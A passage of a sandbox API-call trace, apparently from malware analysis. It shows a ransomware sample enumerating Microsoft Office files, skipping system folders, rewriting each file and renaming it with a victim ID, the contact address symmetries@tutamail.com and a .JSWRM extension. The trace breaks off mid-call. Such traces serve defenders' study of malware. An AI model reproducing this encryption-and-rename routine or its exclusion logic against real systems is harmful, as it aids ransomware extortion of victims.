lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.732] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0114.732] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSACCESS_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msaccess_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.733] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=208) returned 1 [0114.733] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0114.733] ReadFile (in: hFile=0x238, lpBuffer=0x22ea18, nNumberOfBytesToRead=0xd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22ea18*, lpNumberOfBytesRead=0x345e89c*=0xd0, lpOverlapped=0x0) returned 1 [0114.734] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.734] WriteFile (in: hFile=0x238, lpBuffer=0x22ea18*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22ea18*, lpNumberOfBytesWritten=0x345e898*=0xd0, lpOverlapped=0x0) returned 1 [0114.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0114.734] CloseHandle (hObject=0x238) returned 1 [0114.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0114.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0114.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0114.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0114.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0114.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0114.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0114.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0114.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0114.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0114.735] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSACCESS_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msaccess_col.hxt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSACCESS_COL.HXT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msaccess_col.hxt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0114.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0114.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0114.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0114.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0114.736] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9b8364e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9b8364e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9ba9874, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x72, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="MSACCESS_F_COL.HXK", cAlternateFileName="MSACCE~2.HXK")) returned 1 [0114.736] lstrcmpiW (lpString1="MSACCESS_F_COL.HXK", lpString2=".") returned 1 [0114.736] lstrcmpiW (lpString1="MSACCESS_F_COL.HXK", lpString2="..") returned 1 [0114.736] lstrcmpiW (lpString1="MSACCESS_F_COL.HXK", lpString2="...") returned 1 [0114.736] lstrcmpiW (lpString1="MSACCESS_F_COL.HXK", lpString2="windows") returned -1 [0114.736] lstrcmpiW (lpString1="MSACCESS_F_COL.HXK", lpString2="recovery") returned -1 [0114.736] lstrcmpiW (lpString1="MSACCESS_F_COL.HXK", lpString2="perflogs") returned -1 [0114.736] lstrcmpiW (lpString1="MSACCESS_F_COL.HXK", lpString2="documents and settings") returned 1 [0114.736] lstrcmpiW (lpString1="MSACCESS_F_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0114.736] lstrcmpiW (lpString1="MSACCESS_F_COL.HXK", lpString2="system volume information") returned -1 [0114.736] lstrcmpiW (lpString1="MSACCESS_F_COL.HXK", lpString2="msocache") returned -1 [0114.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0114.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSACCESS_F_COL.HXK", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0114.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0114.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSACCESS_F_COL.HXK", cchWideChar=18, lpMultiByteStr=0x241268, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSACCESS_F_COL.HXK", lpUsedDefaultChar=0x0) returned 18 [0114.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0114.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSACCESS_F_COL.HXK", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0114.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0114.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSACCESS_F_COL.HXK", cchWideChar=18, lpMultiByteStr=0x2411c8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSACCESS_F_COL.HXK", lpUsedDefaultChar=0x0) returned 18 [0114.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0114.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0114.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.737] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0114.737] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSACCESS_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msaccess_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.737] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=114) returned 1 [0114.737] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0114.738] ReadFile (in: hFile=0x238, lpBuffer=0x209530, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209530*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0114.738] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.738] WriteFile (in: hFile=0x238, lpBuffer=0x209530*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209530*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0114.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0114.739] CloseHandle (hObject=0x238) returned 1 [0114.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0114.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0114.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0114.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0114.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0114.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0114.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0114.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0114.739] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSACCESS_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msaccess_f_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSACCESS_F_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msaccess_f_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0114.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0114.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0114.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0114.740] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0114.740] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9b5d49a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9b5d49a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9b8364e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x71, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="MSACCESS_K_COL.HXK", cAlternateFileName="MSACCE~1.HXK")) returned 1 [0114.743] lstrcmpiW (lpString1="MSACCESS_K_COL.HXK", lpString2=".") returned 1 [0114.743] lstrcmpiW (lpString1="MSACCESS_K_COL.HXK", lpString2="..") returned 1 [0114.743] lstrcmpiW (lpString1="MSACCESS_K_COL.HXK", lpString2="...") returned 1 [0114.743] lstrcmpiW (lpString1="MSACCESS_K_COL.HXK", lpString2="windows") returned -1 [0114.743] lstrcmpiW (lpString1="MSACCESS_K_COL.HXK", lpString2="recovery") returned -1 [0114.743] lstrcmpiW (lpString1="MSACCESS_K_COL.HXK", lpString2="perflogs") returned -1 [0114.743] lstrcmpiW (lpString1="MSACCESS_K_COL.HXK", lpString2="documents and settings") returned 1 [0114.743] lstrcmpiW (lpString1="MSACCESS_K_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0114.743] lstrcmpiW (lpString1="MSACCESS_K_COL.HXK", lpString2="system volume information") returned -1 [0114.743] lstrcmpiW (lpString1="MSACCESS_K_COL.HXK", lpString2="msocache") returned -1 [0114.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0114.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSACCESS_K_COL.HXK", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0114.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0114.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSACCESS_K_COL.HXK", cchWideChar=18, lpMultiByteStr=0x240fe8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSACCESS_K_COL.HXK", lpUsedDefaultChar=0x0) returned 18 [0114.743] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0114.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSACCESS_K_COL.HXK", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0114.743] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0114.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSACCESS_K_COL.HXK", cchWideChar=18, lpMultiByteStr=0x2411c8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSACCESS_K_COL.HXK", lpUsedDefaultChar=0x0) returned 18 [0114.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0114.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0114.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0114.744] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSACCESS_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msaccess_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.744] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=113) returned 1 [0114.744] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0114.745] ReadFile (in: hFile=0x238, lpBuffer=0x209620, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209620*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0114.745] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.745] WriteFile (in: hFile=0x238, lpBuffer=0x209620*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209620*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0114.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0114.746] CloseHandle (hObject=0x238) returned 1 [0114.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0114.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0114.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0114.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0114.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0114.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0114.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0114.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0114.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.746] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSACCESS_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msaccess_k_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSACCESS_K_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msaccess_k_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0114.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0114.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0114.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0114.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0114.747] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcede6ced, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcede6ced, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xee75a612, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x143c68, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="MSAIN.DLL", cAlternateFileName="")) returned 1 [0114.747] lstrcmpiW (lpString1="MSAIN.DLL", lpString2=".") returned 1 [0114.747] lstrcmpiW (lpString1="MSAIN.DLL", lpString2="..") returned 1 [0114.747] lstrcmpiW (lpString1="MSAIN.DLL", lpString2="...") returned 1 [0114.747] lstrcmpiW (lpString1="MSAIN.DLL", lpString2="windows") returned -1 [0114.747] lstrcmpiW (lpString1="MSAIN.DLL", lpString2="recovery") returned -1 [0114.747] lstrcmpiW (lpString1="MSAIN.DLL", lpString2="perflogs") returned -1 [0114.747] lstrcmpiW (lpString1="MSAIN.DLL", lpString2="documents and settings") returned 1 [0114.747] lstrcmpiW (lpString1="MSAIN.DLL", lpString2="$RECYCLE.BIN") returned 1 [0114.747] lstrcmpiW (lpString1="MSAIN.DLL", lpString2="system volume information") returned -1 [0114.747] lstrcmpiW (lpString1="MSAIN.DLL", lpString2="msocache") returned -1 [0114.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0114.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSAIN.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSAIN.DLL", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSAIN.DLL", lpUsedDefaultChar=0x0) returned 9 [0114.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0114.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0114.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSAIN.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSAIN.DLL", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSAIN.DLL", lpUsedDefaultChar=0x0) returned 9 [0114.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0114.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0114.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0114.748] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc4d9058b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d9058b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc4db6809, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x9362, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="MSO.ACL", cAlternateFileName="")) returned 1 [0114.748] lstrcmpiW (lpString1="MSO.ACL", lpString2=".") returned 1 [0114.748] lstrcmpiW (lpString1="MSO.ACL", lpString2="..") returned 1 [0114.748] lstrcmpiW (lpString1="MSO.ACL", lpString2="...") 